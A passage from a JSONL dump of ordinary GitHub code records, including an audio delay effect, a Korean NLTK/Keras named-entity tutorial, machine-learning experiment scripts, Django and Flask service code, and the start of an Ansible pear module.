use_lowcut_filter is set to True, it will apply a lowcut to the processed input array.\n use_highcut_filter : bool\n If use_highcut_filter is set to True, it will apply a highcut to the processed input array.\n wet : bool\n If set to True it will just return the delay and not mix it with the original signal.\n Used for parallel processing.\n \"\"\"\n def __init__(self,time_in_ms=500,feedback_loops=2,lowcut_filter_frequency=40,highcut_filter_frequency=12000,use_lowcut_filter=False,use_highcut_filter=False,wet=False):\n self.time_in_samples = int(time_in_ms*(sampling_rate/1000)) # builtin int; numpy.int was removed in NumPy 1.24\n self.wet = wet\n self.max_samples = self.time_in_samples*(feedback_loops+2)\n self.delay_buffer = numpy.zeros(int(self.max_samples), dtype=\"float32\")\n self.feedback_ramp = numpy.linspace(0.5,0.1,num=feedback_loops,dtype=\"float32\")\n self.use_lowcut_filter = use_lowcut_filter\n self.use_highcut_filter = use_highcut_filter\n self.LowCutFilter = CreateLowCutFilter(lowcut_filter_frequency)\n self.HighcutFilter = CreateHighCutFilter(highcut_filter_frequency)\n\n def apply(self,float32_array_input):\n \"\"\"Applying the delay effect to a numpy-array.\n\n Parameters\n ----------\n float32_array_input : float\n The array, which the effect should be applied on.\n\n Returns\n -------\n float\n The processed array, should be the exact same size as the input array\n\n \"\"\"\n if (self.use_lowcut_filter == True):\n float32_array_input = self.LowCutFilter.applylowcutfilter(float32_array_input)\n if (self.use_highcut_filter == True):\n float32_array_input = self.HighcutFilter.applyhighcutfilter(float32_array_input)\n\n for counter in range(len(self.feedback_ramp)):\n processed_input = float32_array_input * self.feedback_ramp[counter]\n start_index = self.time_in_samples*(counter+1)\n end_index = (self.time_in_samples*(counter+1))+len(float32_array_input)\n self.delay_buffer[start_index:end_index] += processed_input\n\n if (self.wet == False):\n float32_array_input += self.delay_buffer[0:len(float32_array_input)]\n else:\n float32_array_input = self.delay_buffer[0:len(float32_array_input)]\n\n self.delay_buffer = self.delay_buffer[len(float32_array_input):len(self.delay_buffer)]\n self.delay_buffer = numpy.append(self.delay_buffer,numpy.zeros(len(float32_array_input),dtype=\"float32\"))\n\n return(float32_array_input)\n","repo_name":"ArjaanAuinger/pyaudiodsptools","sub_path":"pyAudioDspTools/EffectDelay.py","file_name":"EffectDelay.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":179,"dataset":"github-code","pt":"47"}
+{"seq_id":"20308040568","text":"from nltk import word_tokenize, pos_tag, ne_chunk\n\nsentence = \"James is working at Disney in London\"\n# tokenization followed by POS tagging\ntokenized_sentence = pos_tag(word_tokenize(sentence))\nprint(tokenized_sentence)\n\n'''\n[('James', 'NNP'), ('is', 'VBZ'), ('working', 'VBG'), \n('at', 'IN'), ('Disney', 'NNP'), ('in', 'IN'), ('London', 'NNP')]\n'''\n\n# named entity recognition\nner_sentence = ne_chunk(tokenized_sentence)\nprint(ner_sentence)\n\n'''\n(S\n (PERSON James/NNP)\n is/VBZ\n working/VBG\n at/IN\n (ORGANIZATION Disney/NNP)\n in/IN\n (GPE London/NNP))\n'''\n\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport urllib.request\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.utils import to_categorical\nfrom sklearn.model_selection import train_test_split\n\n# run the preprocessing\nurllib.request.urlretrieve(
\"https://raw.githubusercontent.com/ukairia777/tensorflow-nlp-tutorial/main/12.%20Sequence%20Labeling/dataset/train.txt\",\n filename=\"train.txt\")\n\nf = open('train.txt', 'r')\ntagged_sentences = []\nsentence = []\n\nfor line in f:\n if len(line) == 0 or line.startswith('-DOCSTART') or line[0] == \"\\n\":\n if len(sentence) > 0:\n tagged_sentences.append(sentence)\n sentence = []\n continue\n splits = line.split(' ') # 공백을 기준으로 속성을 구분한다.\n splits[-1] = re.sub(r'\\n', '', splits[-1]) # 줄바꿈 표시 \\n을 제거한다.\n word = splits[0].lower() # 단어들은 소문자로 바꿔서 저장한다.\n sentence.append([word, splits[-1]]) # 단어와 개체명 태깅만 기록한다.\n\n# 전체 샘플 개수를 확인해보겠습니다.\nprint(\"전체 샘플 개수: \", len(tagged_sentences))\n\n# 훈련을 위한 훈련 데이터에서 단어에 해당되는 부분과 개체명 태깅 정보에 해당되는 부분을 분리\nsentences, ner_tags = [], []\nfor tagged_sentence in tagged_sentences: # 14,041개의 문장 샘플을 1개씩 불러온다.\n sentence, tag_info = zip(*tagged_sentence) # 각 샘플에서 단어들은 sentence에 개체명 태깅 정보들은 tag_info에 저장.\n sentences.append(list(sentence)) # 각 샘플에서 단어 정보만 저장한다.\n ner_tags.append(list(tag_info)) # 각 샘플에서 개체명 태깅 정보만 저장한다.\n\n# 각 문장 샘플에 대해서 단어는 sentences에 태깅 정보는 ner_tags에 저장\nprint('첫번째 샘플의 문장 :', sentences[0])\nprint('첫번째 샘플의 레이블 :', ner_tags[0])\n\n# 전체 데이터의 길이 분포 확인\nprint('샘플의 최대 길이 : %d' % max(len(sentence) for sentence in sentences))\nprint('샘플의 평균 길이 : %f' % (sum(map(len, sentences)) / len(sentences)))\nplt.hist([len(sentence) for sentence in sentences], bins=50)\nplt.xlabel('length of samples')\nplt.ylabel('number of samples')\nplt.show()\n\n# 샘플들의 길이가 대체적으로 0~40의 길이를 가지며,\n# 특히 0~20의 길이를 가진 샘플이 상당한 비율을 차지하는 것을 보여줍니다.\n# 길이가 가장 긴 샘플의 길이는 113입니다.\n\n# 케라스 토크나이저를 통해서 정수 인코딩을 진행합니다.\n# 이번에는 문장 데이터에 있는 모든 단어를 사용하지 않고 높은 빈도수를 가진 상위 약 4,000개의 단어만을 사용합니다.\nvocab_size = 4000\nsrc_tokenizer = Tokenizer(num_words=vocab_size, oov_token='OOV')\nsrc_tokenizer.fit_on_texts(sentences)\n\ntar_tokenizer = Tokenizer()\ntar_tokenizer.fit_on_texts(ner_tags)\n\n# 문장 데이터에 대해서는 src_tokenizer를, 레이블에 해당되는 개체명 태깅 정보에 대해서는 tar_tokenizer를 사용합니다.\ntag_size = len(tar_tokenizer.word_index) + 1\nprint('단어 집합의 크기 : {}'.format(vocab_size))\nprint('개체명 태깅 정보 집합의 크기 : {}'.format(tag_size))\n\n# 정수 인코딩을 수행합니다.\n# 문장 데이터에 대해서 정수 인코딩이 수행된 결과는 X_train,\n# 개체명 태깅 데이터에 대해서 정수 인코딩이 수행된 결과는 y_train에 저장되었습니다.\nX_train = src_tokenizer.texts_to_sequences(sentences)\ny_train = tar_tokenizer.texts_to_sequences(ner_tags)\n\n# 정수 인코딩이 되었는지 확인을 위해 임의로 첫번째 샘플을 출력해보겠습니다.\nprint('첫번째 샘플의 문장 :', X_train[0])\nprint('첫번째 샘플의 레이블 :', y_train[0])\n\n# 현재 문장 데이터에 대해서는 일부 단어가 'OOV'로 대체된 상황입니다.\n# 이를 확인하기 위해 디코딩 작업을 진행해봅시다.\n# 이를 위해 정수로부터 단어로 변환하는 index_to_word를 만듭니다.\nindex_to_word = src_tokenizer.index_word\nindex_to_ner = tar_tokenizer.index_word\n\n# 정수 인코딩 된 첫번째 문장을 다시 디코딩해보겠습니다.\ndecoded = []\nfor index in X_train[0]: # 첫번째 샘플 안의 각 정수로 변환된 단어에 대해서\n decoded.append(index_to_word[index]) # 단어로 변환\n\nprint('기존 문장 : {}'.format(sentences[0]))\nprint('빈도수가 낮은 단어가 OOV 처리된 문장 : {}'.format(decoded))\n\n# 일부 단어가 'OOV'로 대체되었습니다.\n# 앞서 본 그래프에 따르면, 대부분의 샘플은 길이가 70 이내입니다.\n# X에 해당되는 데이터 X_train의 샘플들과\n# y에 해당되는 데이터 y_train 샘플들의 모든 길이를 임의로 70정도로 맞추어 보겠습니다.\n# 패딩을 진행합니다.\nmax_len = 70\nX_train = pad_sequences(X_train, padding='post', maxlen=max_len)\ny_train = pad_sequences(y_train, padding='post', maxlen=max_len)\n\n# 훈련 데이터와 테스트 데이터를 8:2의 비율로 분리합니다.\nX_train, X_test, y_train, y_test = train_test_split(X_train, y_train, test_size=.2, random_state=777)\n\n# 레이블에 해당하는 태깅 정보에 대해서 원-핫 인코딩을 수행합니다.\ny_train = to_categorical(y_train, num_classes=tag_size)\ny_test = to_categorical(y_test, num_classes=tag_size)\n\n# 각 데이터에 대한 크기(shape)를 
확인해보겠습니다.\nprint('훈련 샘플 문장의 크기 : {}'.format(X_train.shape))\nprint('훈련 샘플 레이블의 크기 : {}'.format(y_train.shape))\nprint('테스트 샘플 문장의 크기 : {}'.format(X_test.shape))\nprint('테스트 샘플 레이블의 크기 : {}'.format(y_test.shape))\n\n# 모델 구축\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Embedding, LSTM, Bidirectional, TimeDistributed\nfrom tensorflow.keras.optimizers import Adam\n\nembedding_dim = 128\nhidden_units = 128\n\nmodel = Sequential()\nmodel.add(Embedding(input_dim=vocab_size, output_dim=embedding_dim, input_length=max_len, mask_zero=True))\nmodel.add(Bidirectional(LSTM(hidden_units, return_sequences=True)))\nmodel.add(TimeDistributed(Dense(tag_size, activation='softmax')))\n\nmodel.compile(loss='categorical_crossentropy', optimizer=Adam(0.001), metrics=['accuracy'])\nmodel.fit(X_train, y_train, batch_size=128, epochs=8, validation_data=(X_test, y_test))\n\n# 학습이 종료되었다면 테스트 데이터에 대한 정확도를 측정합니다.\nprint(\"\\n 테스트 정확도: %.4f\" % (model.evaluate(X_test, y_test)[1]))\n\n# 실제로 맞추고 있는지를 임의의 테스트 샘플로부터(인덱스 10번) 직접 실제값과 비교해보겠습니다.\n# index_to_word와 index_to_ner를 사용하여 테스트 데이터에 대한 예측값과 실제값을 비교 출력합니다.\n\ni = 10 # 확인하고 싶은 테스트용 샘플의 인덱스.\n\n# 입력한 테스트용 샘플에 대해서 예측 y를 리턴\ny_predicted = model.predict(np.array([X_test[i]]))\n\n# 확률 벡터를 정수 레이블로 변경.\ny_predicted = np.argmax(y_predicted, axis=-1)\n\n# 원-핫 벡터를 정수 인코딩으로 변경.\nlabels = np.argmax(y_test[i], -1)\n\nprint(\"{:15}|{:5}|{}\".format(\"단어\", \"실제값\", \"예측값\"))\nprint(35 * \"-\")\n\nfor word, tag, pred in zip(X_test[i], labels, y_predicted[0]):\n if word != 0: # PAD값은 제외함.\n print(\"{:17}: {:7} {}\".format(index_to_word[word], index_to_ner[tag].upper(), index_to_ner[pred].upper()))","repo_name":"jiyongKim615/tagging_task","sub_path":"nltk_ner_example.py","file_name":"nltk_ner_example.py","file_ext":"py","file_size_in_byte":8151,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24376455602","text":"from sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom commons import prepareTrainData\nfrom commons import evaluateClassifier\nfrom commons import printSubmission\n\n\nname = \"RFLR\"\n\n\nclass RFLREstimator:\n\n def get_params(self, deep=False):\n return {}\n\n def fit(self, X, y):\n X_train, X_train_lr, y_train, y_train_lr = train_test_split(\n X,\n y,\n test_size=0.5,\n )\n self.rf = RandomForestClassifier(\n n_estimators=160,\n max_depth=10,\n )\n self.lr = LogisticRegression()\n self.rf.fit(X_train, y_train)\n self.enc = OneHotEncoder()\n self.enc.fit(self.rf.apply(X_train))\n self.lr.fit(self.enc.transform(self.rf.apply(X_train_lr)), y_train_lr)\n\n def predict_proba(self, X):\n return self.lr.predict_proba(self.enc.transform(self.rf.apply(X)))\n\n\nif __name__ == \"__main__\":\n rflr = RFLREstimator()\n featureList = [\n 'bids_cnt', 'price_std', 'device_cnt', 'response_min',\n 'mean_bids_per_auction', 'price_max', 'response_median', 'country_cnt', \n 'price_mean', 'response_mean'\n ]\n X_train, y_train = prepareTrainData(featureList)\n evaluateClassifier(rflr, X_train, y_train, name)\n printSubmission(rflr, X_train, y_train, name, featureList)\n","repo_name":"laoreja/CS229-project-Robot-or-human","sub_path":"predictors/RFLR.py","file_name":"RFLR.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} 
+{"seq_id":"37600046371","text":"from pyeasyga import pyeasyga as galg\r\nimport random\r\nimport itertools\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nglobal pmVec\r\nglobal numClusters\r\nnumClusters=3\r\ndataSize=100\r\ndata=[]\r\nroof=1000\r\nfor a in range(dataSize):\r\n data.append((\"\",random.randint(0,roof),random.randint(0,roof)))\r\n\r\npopSize=20\r\nnumGenerations=500\r\ncrossoverProb=0.4\r\nmutationProb=0.8\r\n\r\nga = galg.GeneticAlgorithm(data,popSize,numGenerations,crossoverProb,mutationProb,True,True)\r\n\r\ndef create_individual(data):\r\n return [random.randint(0,numClusters-1) for _ in range(len(data))]\r\n\r\ndef mutate(individual):\r\n mutate_index = random.randrange(len(individual))\r\n individual[mutate_index]=random.randint(0,numClusters-1)\r\nga.mutate_function = mutate\r\nga.create_individual = create_individual\r\ndef fitness(individual, data):\r\n fn = 0\r\n for i in range(numClusters):\r\n #Pra cada cluster cria uma lista de elementos pertencentes apenas a ela\r\n lsElements=[]\r\n clusterEmpty=True\r\n for (selected, (_, x,y)) in zip(individual, data):\r\n if(selected == i): \r\n lsElements.append((x,y))\r\n clusterEmpty=False #Checa se existe alguma cluster vazia\r\n if(clusterEmpty):\r\n return 0 #Caso a cluster analisada esteja vazia retorna fitness 0\r\n \r\n if(len(lsElements)==0): break\r\n smCluster=0\r\n pmX=0\r\n pmY=0\r\n clusterSize=len(lsElements)\r\n #Define o ponto médio entre os elementos da cluster\r\n for (x,y) in lsElements:\r\n pmX+=x\r\n pmY+=y\r\n pmX/=clusterSize\r\n pmY/=clusterSize\r\n #Calcula a soma das distâncias dos pontos da cluster até o centro dela\r\n for (x,y) in lsElements:\r\n smCluster+=pow(pow(x-pmX,2)+pow(y-pmY,2),0.5)\r\n #Calcula a média das distâncias (evita que clusters que tenham muitos elementos acabem com uma fitness reduzida indevidamente)\r\n smCluster*=clusterSize\r\n fn+=smCluster\r\n fn=numClusters/fn\r\n\r\n return fn\r\n \r\nga.fitness_function = fitness\r\n\r\nga.run()\r\n\r\n#for individual in ga.last_generation():\r\n #print (individual)\r\n\r\nprint (ga.best_individual())\r\nbestind=ga.best_individual()\r\ncromossome=bestind[1]\r\n\r\ncolorset=[\"#f00\",\"#0f0\",\"#00f\",\"#0cf\",\"#ff0\",\"#2b2\",\"#0aa\",\"#aac\"]\r\nfig, ax = plt.subplots()\r\npmx = 0 \r\npmy = 0\r\nfor clusterInd in range(numClusters):\r\n i=0\r\n for pt in data:\r\n if(clusterInd==cromossome[i]):\r\n ax.plot(pt[1],pt[2],\".\",c=colorset[clusterInd])\r\n ax.text(pt[1]-0.15,pt[2]+0.4,data[i][0])\r\n i+=1\r\n\r\n\r\nplt.show()\r\n","repo_name":"cbrlpdr/ga","sub_path":"test_cluster.py","file_name":"test_cluster.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22932221501","text":"from django.http import HttpResponse\nfrom tablib import Dataset\n\nfrom .resources import ProductResource\n\n\n# import tablib\n# from import_export import resources\n# from product.models import Product\n\n\n\ndef export_data(request, post_data):\n product_resource = ProductResource()\n dataset = product_resource.export()\n \n if post_data.get('select') == 'json':\n response = HttpResponse(dataset.json, headers={\n 'Content-Type': 'application/json',\n 'Content-Disposition': 'attachment; filename=\"product.json\"',\n })\n msg = f'Export to {post_data.get(\"select\")} successfuly'\n return (response, msg)\n\n if post_data.get('select') == 'excel':\n response = HttpResponse(dataset.xls, headers={\n 'Content-Type': 
'application/vnd.ms-excel',\n 'Content-Disposition': 'attachment; filename=\"product.xls\"',\n })\n msg = f'Export to {post_data.get(\"select\")} successfuly'\n return (response, msg)\n\n if post_data.get('select') == 'csv':\n response = HttpResponse(dataset.csv, headers={\n 'Content-Type': 'text/csv',\n 'Content-Disposition': 'attachment; filename=\"product.csv\"',\n })\n msg = f'Export to {post_data.get(\"select\")} successfuly'\n return (response, msg)\n\n\n\n\n# def import_data(request):\n# print('hello')\n# product_resource = ProductResource()\n# dataset = Dataset()\n# new_products = request.FILES['data_file']\n# product = new_products.read()\n# imported_data = dataset.load(product)\n\n# list_data = list(imported_data)\n# key = ['id','create', 'by_user','name','url_name','price','discount_price','short_description','long_description','quantity_in_stock','available','product_type','product_image','is_deleted']\n\n# for k, product in enumerate(list_data):\n# l = list()\n# for i, item in zip(key, product ):\n# data = dict([(i, item)])\n# l.append(data)","repo_name":"patrice012/ecommerce","sub_path":"dashboard/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19481763948","text":"# Calculate factorial of any number\n\nnumber = int(input(\"Enter any number to calculate factorial:- \"))\nfact = 1\nif number > 0:\n if number == 1:\n print(fact)\n for i in range(number, 1, -1):\n fact = i * fact\n print(\"Factorial Of\", number, 'is: ', fact)\n\nelse:\n print(\"You entered wrong number:\")\n","repo_name":"vishvajitrao/Python_Programs","sub_path":"FactorialofNumber.py","file_name":"FactorialofNumber.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9566894696","text":"from django.urls import path\nfrom rest_framework_simplejwt import views as jwt_views\n\nfrom . 
import views\n\nurlpatterns = [\n path(\"token/\", jwt_views.TokenObtainPairView.as_view(), name=\"token_obtain_pair\"),\n path(\"token/refresh/\", jwt_views.TokenRefreshView.as_view(), name=\"token_refresh\"),\n path(\"create_account/\", views.AccountCreateView.as_view(), name=\"account_create\"),\n path(\"balance/\", views.AccountBalanceView.as_view(), name=\"balance\"),\n path(\"deposit//\", views.DepositView.as_view(), name=\"deposit\"),\n path(\"withdrawal/\", views.WithdrawalView.as_view(), name=\"withdrawal\"),\n]\n","repo_name":"rodrigoazs/django-rest-test","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71133539663","text":"#\n# @lc app=leetcode.cn id=1021 lang=python\n#\n# [1021] 删除最外层的括号\n#\n\n# @lc code=start\nclass Solution(object):\n def removeOuterParentheses(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n '''\n 思路二:参考最佳题解,\n 初始化,跳过最外面的��括号,左括号计数初始为1,右为0\n 枚举字符串中的字符对左右括号进行计数;\n 如果左右计数不相等,把当前字符放入结果字符串ans;\n 否则,不放入结果字符串,重新执行“初始化”过程,继续枚举字符;\n 枚举结束,返回ans。\n '''\n L = 1\n R = 0\n ans = \"\"\n i = 1\n while i < len(s):\n if s[i] == \"(\": L += 1\n else: R += 1\n if (R != L): ans += s[i]\n else:\n i += 1\n L = 1\n R = 0\n i += 1\n return ans\n\n# @lc code=end\n\n","repo_name":"chunxianwang/datastruct_algorithm","sub_path":"Week_02-哈希表-集合-树-图/1021.删除最外层的括号.py","file_name":"1021.删除最外层的括号.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24841597097","text":"\r\nimport numpy as np\r\nimport matplotlib\r\nfrom src.data_management import DataHandler, Settings\r\nfrom src.methods import FixedBias, UnconditionalMetaLearning, ConditionalMetaLearning\r\nfrom src.plotting import plot_stuff\r\nimport time\r\nimport datetime\r\n\r\n\r\ndef main():\r\n\r\n # Custom's selection\r\n exp = 'exp_synthetic_1_cluster' # Figure 1 top-left\r\n # exp = 'exp_synthetic_2_clusters_mean_4' # Figure 1 top-right\r\n # exp = 'exp_synthetic_2_clusters_mean_0' # Figure 1 bottom-left\r\n # exp = 'exp_synthetic_circle' # Figure 1 bottom-right\r\n # exp = 'exp_real_lenk' # Figure 2 left\r\n # exp = 'exp_real_schools' # Figure 2 right\r\n\r\n if exp == 'exp_synthetic_1_cluster':\r\n methods = ['ITL', 'oracle_unconditional', 'unconditional', 'conditional']\r\n loss_name = 'absolute'\r\n elif exp == 'exp_synthetic_2_clusters_mean_4':\r\n methods = ['ITL', 'oracle_unconditional', 'unconditional', 'conditional']\r\n loss_name = 'absolute'\r\n elif exp == 'exp_synthetic_2_clusters_mean_0':\r\n methods = ['ITL', 'oracle_unconditional', 'unconditional', 'conditional']\r\n loss_name = 'absolute'\r\n elif exp == 'exp_synthetic_circle':\r\n methods = ['ITL', 'oracle_unconditional', 'unconditional', 'conditional_sin_cos', 'conditional_fourier']\r\n loss_name = 'absolute'\r\n elif exp == 'exp_real_lenk':\r\n methods = ['ITL', 'unconditional', 'conditional']\r\n loss_name = 'absolute'\r\n elif exp == 'exp_real_schools':\r\n methods = ['ITL', 'unconditional', 'conditional']\r\n loss_name = 'absolute'\r\n\r\n font = {'size': 26}\r\n matplotlib.rc('font', **font)\r\n results = {}\r\n\r\n lambda_par_range = [10 ** i for i in np.linspace(-5, 5, 14)] # inner regularization parameter lambda\r\n gamma_par_range = [10 ** i for i in np.linspace(-5, 5, 14)] # meta-step size gamma\r\n\r\n for curr_method in methods:\r\n\r\n results[curr_method] = []\r\n\r\n tt = 
time.time()\r\n\r\n trials = 10\r\n\r\n for seed in range(trials):\r\n\r\n print(f'SEED : ', seed, ' ---------------------------------------')\r\n np.random.seed(seed)\r\n general_settings = {'seed': seed,\r\n 'verbose': 1}\r\n\r\n if exp == 'exp_synthetic_1_cluster':\r\n\r\n # synthetic data 1 cluster\r\n data_settings = {'dataset': 'synthetic-regression',\r\n 'n_tr_tasks': 300,\r\n 'n_val_tasks': 100,\r\n 'n_test_tasks': 80,\r\n 'n_all_points': 20,\r\n 'ts_points_pct': 0.5,\r\n 'n_dims': 20,\r\n 'noise_std': 0.2}\r\n\r\n settings = Settings(data_settings, 'data')\r\n settings.add_settings(general_settings)\r\n data = DataHandler(settings)\r\n # quantities for generating the feature map\r\n feature_map_name = 'linear'\r\n r = None\r\n W = None\r\n\r\n elif exp == 'exp_synthetic_2_clusters_mean_4':\r\n\r\n # synthetic data MULTI clusters w_\\rho = 4\r\n data_settings = {'dataset': 'synthetic-regression-multi-clusters',\r\n 'n_tr_tasks': 300,\r\n 'n_val_tasks': 100,\r\n 'n_test_tasks': 80,\r\n 'n_all_points': 20,\r\n 'ts_points_pct': 0.5,\r\n 'n_dims': 20,\r\n 'noise_std': 0.2}\r\n\r\n settings = Settings(data_settings, 'data')\r\n settings.add_settings(general_settings)\r\n data = DataHandler(settings)\r\n # quantities for generating the feature map\r\n feature_map_name = 'linear'\r\n r = None\r\n W = None\r\n\r\n elif exp == 'exp_synthetic_2_clusters_mean_0':\r\n\r\n # synthetic data MULTI clusters w_\\rho = 0\r\n data_settings = {'dataset': 'synthetic-regression-multi-clusters-BIS',\r\n 'n_tr_tasks': 300,\r\n 'n_val_tasks': 100,\r\n 'n_test_tasks': 80,\r\n 'n_all_points': 20,\r\n 'ts_points_pct': 0.5,\r\n 'n_dims': 20,\r\n 'noise_std': 0.2}\r\n\r\n settings = Settings(data_settings, 'data')\r\n settings.add_settings(general_settings)\r\n data = DataHandler(settings)\r\n # quantities for generating the feature map\r\n feature_map_name = 'linear'\r\n r = None\r\n W = None\r\n\r\n elif exp == 'exp_synthetic_circle':\r\n\r\n # synthetic data - circle\r\n data_settings = {'dataset': 'circle',\r\n 'n_tr_tasks': 300,\r\n 'n_val_tasks': 100,\r\n 'n_test_tasks': 80,\r\n 'n_all_points': 20,\r\n 'ts_points_pct': 0.5,\r\n 'n_dims': 20,\r\n 'noise_std': 0.2,\r\n 'radius_w': 8,\r\n 'sigma_w': 1}\r\n\r\n settings = Settings(data_settings, 'data')\r\n settings.add_settings(general_settings)\r\n data = DataHandler(settings)\r\n\r\n elif exp == 'exp_real_lenk':\r\n\r\n # Lenk dataset\r\n data_settings = {'dataset': 'lenk',\r\n 'n_tr_tasks': 100,\r\n 'n_val_tasks': 40,\r\n 'n_test_tasks': 30,\r\n }\r\n\r\n settings = Settings(data_settings, 'data')\r\n settings.add_settings(general_settings)\r\n data = DataHandler(settings)\r\n # quantities for generating the feature map\r\n feature_map_name = 'linear_with_labels'\r\n r = None\r\n W = None\r\n\r\n elif exp == 'exp_real_schools':\r\n\r\n # Schools dataset\r\n data_settings = {'dataset': 'schools',\r\n 'n_tr_tasks': 70,\r\n 'n_val_tasks': 39,\r\n 'n_test_tasks': 30,\r\n 'ts_points_pct': 0.25\r\n }\r\n\r\n settings = Settings(data_settings, 'data')\r\n settings.add_settings(general_settings)\r\n data = DataHandler(settings)\r\n # quantities for generating the feature map\r\n feature_map_name = 'fourier_vector'\r\n k = 1000\r\n sigma = 100\r\n d_size = data.features_tr[0].shape[1]\r\n r = np.random.uniform(low=0., high=2 * np.pi, size=(k, 1))\r\n W = np.random.randn(k, d_size) * sigma\r\n\r\n print(f'METHOD: ', settings.data.dataset)\r\n\r\n for curr_method in methods:\r\n\r\n # print(f'method: ', curr_method)\r\n\r\n if curr_method == 'ITL':\r\n model = 
FixedBias(np.zeros(data.features_tr[0].shape[1]), lambda_par_range, loss_name)\r\n elif curr_method == 'oracle_unconditional':\r\n model = FixedBias(data.oracle_unconditional, lambda_par_range, loss_name)\r\n elif curr_method == 'unconditional':\r\n model = UnconditionalMetaLearning(lambda_par_range, gamma_par_range, loss_name)\r\n elif curr_method == 'conditional':\r\n model = ConditionalMetaLearning(lambda_par_range, gamma_par_range, loss_name, feature_map_name, r, W,\r\n settings.data.dataset)\r\n elif curr_method == 'conditional_sin_cos':\r\n feature_map_name = 'circle_feature_map'\r\n r = None\r\n W = None\r\n model = ConditionalMetaLearning(lambda_par_range, gamma_par_range, loss_name, feature_map_name, r, W,\r\n settings.data.dataset)\r\n elif curr_method == 'conditional_fourier':\r\n feature_map_name = 'circle_fourier'\r\n import math\r\n s_dim = 50\r\n sigma = 2 * math.pi * 10\r\n r = 2 * math.pi * np.random.uniform(0.0, 1.0, s_dim)\r\n W = sigma * np.random.randn(s_dim)\r\n model = ConditionalMetaLearning(lambda_par_range, gamma_par_range, loss_name, feature_map_name, r, W,\r\n settings.data.dataset)\r\n\r\n errors = model.fit(data)\r\n\r\n results[curr_method].append(errors)\r\n\r\n print('%s done %5.2f' % (curr_method, time.time() - tt))\r\n\r\n print('seed: %d | %5.2f sec' % (seed, time.time() - tt))\r\n\r\n np.save(settings.data.dataset + '_' + 'temp_test_error' + '_' + str(datetime.datetime.now()).replace(':', '') +\r\n '.npy', results)\r\n plot_stuff(results, methods, settings.data.dataset)\r\n\r\n exit()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n main()\r\n","repo_name":"dGiulia/ConditionalMetaLearning","sub_path":"main_script.py","file_name":"main_script.py","file_ext":"py","file_size_in_byte":9033,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"8932945023","text":"import pika\nfrom pika import channel\nimport redis\nfrom flask import Flask, request, redirect, url_for, flash, jsonify\nimport numpy as np\nimport pickle as p\nimport json\nimport asyncio\nimport uuid\nimport time\nfrom flask_cors import CORS\n\n\nred = redis.Redis(\n host= 'localhost',\n port= '6379',\n db=0)\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/api/', methods=['POST'])\ndef receive_data():\n if request.method == \"POST\":\n\n data = request.files['file']\n print (f\"Recieve filename: {data.filename}\")\n id = str(uuid.uuid1())\n body = {'id':id,\n 'signal':data.read().decode('latin-1')}\n\n # push data to queue rabbitmq\n connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\n channel = connection.channel()\n channel.queue_declare(queue='hello')\n channel.basic_publish(exchange='',\n routing_key='hello',\n body=json.dumps(body)\n )\n # set id for request\n red.set(id,json.dumps({'status':'pending'}))\n \n # await until worker done\n while json.loads(red.get(id))['status'] == \"pending\":\n time.sleep(0.1)\n pass\n \n # get result from redis\n result = json.loads(red.get(id))['result']\n\n connection.close()\n return jsonify({'result':result})\n\nif __name__ == '__main__':\n app.run(debug=True, host='localhost', port=1234, threaded=True)","repo_name":"vanhocvp/demo_voice_service","sub_path":"service/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"25110519007","text":"#!/usr/bin/python -tt\n# -*- coding: utf-8 -*-\n\n# (c) 2012, Afterburn \n# (c) 2013, Aaron Bull 
Schaefer \n# (c) 2015, Jonathan Lestrelin \n#\n# This file is part of Ansible\n#\n# Ansible is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Ansible is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Ansible. If not, see .\n\nANSIBLE_METADATA = {'status': ['preview'],\n 'supported_by': 'community',\n 'version': '1.0'}\n\nDOCUMENTATION = '''\n---\nmodule: pear\nshort_description: Manage pear/pecl packages\ndescription:\n - Manage PHP packages with the pear package manager.\nversion_added: 2.0\nauthor:\n - \"'jonathan.lestrelin' \"\noptions:\n name:\n description:\n - Name of the package to install, upgrade, or remove.\n required: true\n\n state:\n description:\n - Desired state of the package.\n required: false\n default: \"present\"\n choices: [\"present\", \"absent\", \"latest\"]\n'''\n\nEXAMPLES = '''\n# Install pear package\n- pear:\n name: 